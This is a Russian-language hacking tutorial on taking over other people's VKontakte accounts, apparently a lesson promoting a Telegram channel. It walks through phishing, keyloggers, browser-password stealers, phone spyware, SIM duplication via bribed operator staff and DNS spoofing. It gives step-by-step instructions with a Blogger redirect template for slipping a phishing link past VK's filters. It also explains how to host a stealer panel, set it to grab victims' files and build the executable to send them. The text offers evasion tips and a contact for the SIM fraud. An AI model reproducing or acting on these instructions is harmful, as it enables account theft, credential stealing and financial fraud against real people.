Как взломать ВК?

Мы составили для Вас список методов, которые помогут вам завладеть чужой учеткой. Давайте пробежимся по каждому из них, а затем разберем самые оптимальные способы и выберем, какой же подойдет именно вам в конкретной ситуации. 

Фишинг

Наверное, самый распространённый метод взлома страниц в социальных сетях. Суть заключается в создании идентичной  по структуре и дизайну страницы, на которой сайт запрашивает логин и пароль. Когда они введены, данные отправляются прямиком в наши руки.

Кейлоггер (клавиатурный шпион)

Этот метод, наверное, самый простой из всех. И к тому же, самый действенный, каким бы опытным не был пользователь, обнаружить кейлоггер, не проводя целенаправленно его поиск – невозможно. Устанавливаем кейлоггер на компьютер жертвы, наше ПО начинает записывать абсолютно всё, что вводится на клавиатуре, и отправляет эти данные нам. Причём нам даже не обязательно иметь доступ к компьютеру, чтобы установить подобную программу. Достаточно лишь заставить жертву запустить файл, который мы ей отправим, завернув в заманчивую и красивую обертку.

Конечно, опытный пользователь не станет запускать неизвестные программы, полученные непонятно от кого, но не стоит забывать, что у всех нас есть родственники, друзья, которые с удовольствием запустят файл с названием «photo.exe» или что-то в этом роде. А так же о том, что мы можем вшить наше ПО в вполне себе безобидную программу

Стиллер

Многие люди используют такую функцию в браузере, как «запомнить пароль». Это позволяет им не вводить пароль каждый раз при входе в свой аккаунт. Это довольно опасно для жертвы и опять же, прекрасно для нас. Устанавливаем на компьютер программу, которая будет брать данные из из всех браузеров и отправлять их нам.

Взлом мобильного телефона 

Ввиду того, что многие люди используют свои телефоны для того, чтобы заходить в свои социальные сети, взломать их становится проще. Если мы каким-либо образом можем получить доступ к телефону жертвы, то сможем получить доступ и к ее страничке ВКонтакте, банку и куче других, потенциально интересных нам вещей. Существует много различных инструментов и приложений для отслеживания чьего-то смартфона. К примеру, Spy Phone Gold и Mobile Spy. 

Дубликат СИМ-карты 

Самый действенный способ, но требует затрат (Если вы, конечно, не работник одного из сотовых операторов). Стоит нам создать дубликат СИМкарты и можно считать, что все акки жертвы уже у нас. Стоит такая услуга от 1 до 3к рублей и выполняется сотрудниками-крысами в стане оператора.

Самый опасный способ с точки зрения преследования по закону. Но самый простой в реализации. Если кто-то из вас все же решится, то предоставим по запросу контакты исполнителя. Его лучше использовать для интернет-банкинга, например. Когда на кону большие суммы денег. Лучше все делать не в своем городе. Телефон, ноут (если задействован) – в утиль сразу же после окончания.

Метод подделки DNS 

Метод будет работать только в ситуации, когда жертва и мы находимся в одной и той же сети. Этот способ позволяет нам создать фейковую страницу авторизации, и, как результат, получить данные, введённые пользователем и, следовательно, доступ к его странице. 

К оружию!

Давайте рассмотрим, как создать фишинговый сайт ВК (по аналогии, подойдет так же и для других соц.сетей и т.д.).

Мы подготовили для вас уже настроенные скрипты страницы входа. (будет приложено к лекции).

Все, что вам остается – это залить готовый скрипт на хостинг и гнать на него жертву. 

Могу от себя посоветовать несколько хостингов:
https://www.000webhost.com/ - совершенно бесплатный хостинг. https://www.host-food.ru/ - стабильный и очень дешевый (Иногда администрация может банить, если будут жалобы).

К сожалению вк не пропускает подозрительные ссылки, даже если они предварительно сокращёны.

Поэтому делаем редирект и прогоняе ссылку на наш сайт через blogger.com:

1. Регистрируемся
2. Создаём новый блог
3. В управлении блогом нажимаем изменить HTML
4. Стираем всё и вставляем это:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html b:css='false' b:defaultwidgetversion='2' b:layoutsVersion='3'
b:responsive='true' b:templateUrl='indie.xml' b:templateVersion='1.1.1'
expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml'
xmlns:b='http://www.google.com/2005/gml/b'
xmlns:data='http://www.google.com/2005/gml/data'
xmlns:expr='http://www.google.com/2005/gml/expr'>
<meta content='0; url= ' http-equiv='Refresh'/>
<head>
<b:skin version='1.1.0'><![CDATA[
]]></b:skin>
</head>
<body>
<b:section class='footer' id='footer' name='Footer' showaddelement='false'
tag='footer'/>
</body>
</html>

*где URL вставляем ссылку на наш фишинг сайт

5. сохраняем

6. Копируем ссылку на наш блог и уже после всего проделанного сокращаем через vk.cc

Готово!

Кейлоггер

Тут трудностей не возникнет. Используем уже известный нами sAINT.

Установка:

Проходим регистрацию на хостинге Sweb Сразу говорю, хостинг бесплатный, точнее с тест периодом, просто читайте и смотрите внимательно!

Дальше все стандартно, пишем почту, вводим каптчу, регистрируем аккаунт.. После регистрации на почту придет письмо, где будут данные для входа в панель управления и FTP

Качаем Filezilla, вводим Ip адрес сервера, логин, пароль и подключаемся к серверу.. Сворачиваем Filelzilla (не закрываем и идем дальше )

Переходим на хостинге в панеле управления в раздел Базы MYSQL. Создаем базу, придумываем пароль ( логин дан по умолчанию ), далее нажимаем сюда.

Вводим придуманный вами пароль от базы.. Далее просто открываем папку со стиллером, переходим в папку panel - panel - info и копируем файл dump.sql на рабочий стол.

Возвращаемся на хостинг, Нажимаем "импорт" - выбираем нашу базу (dump.sql) и загружаем.

Далее качаем Notepad ++ , переходим в папку со стиллером, находим файл index.php , открываем его через Notepad ++ , и прописываем имя базы 9 совпадает с базой ) и пароль от базы , как на скрине:

Дальше открываем нашу настроенную Filezill-у , нажимаем на папку publik_html и перетаскиваем.

Файлы стиллера на хост, в точности как на скрине:

Осталось совсем немного, на пути к успеху. Переходим на нашу почту, открываем письмо от хостинга, находим тестовый домен, который они предоставили:

Далее пишем ссылку: Ваш Домен/panel/admin.php , вставляем ее в браузер и попадаем на админ панель вашего стиллака.. Вводим пароль ( редактируется в index.php, забыл упомянуть, на скрине видно ) и заходим в админку.

Ставим все галочки , Настраиваем граб файлов с рабочего стола, все как на скрине 

Открываем билдер и прописываем ссылку: http://Вашдомен/index.php . Далее ваш билд добавится в папку с билдером. Если выскочит такая ошибка: 

ничего страшного , просто закройте.

Далее заходим в папку с билдером, и находим там непонятный файл с названием bin. Открываем свойства файла и дописываем расширение, что бы получилось bin.exe. Это и есть Ваш вирус, открыв который жертва нарвется на вашу ярость и мощь!

Больше авторских статьей на канале T.me/krebsstore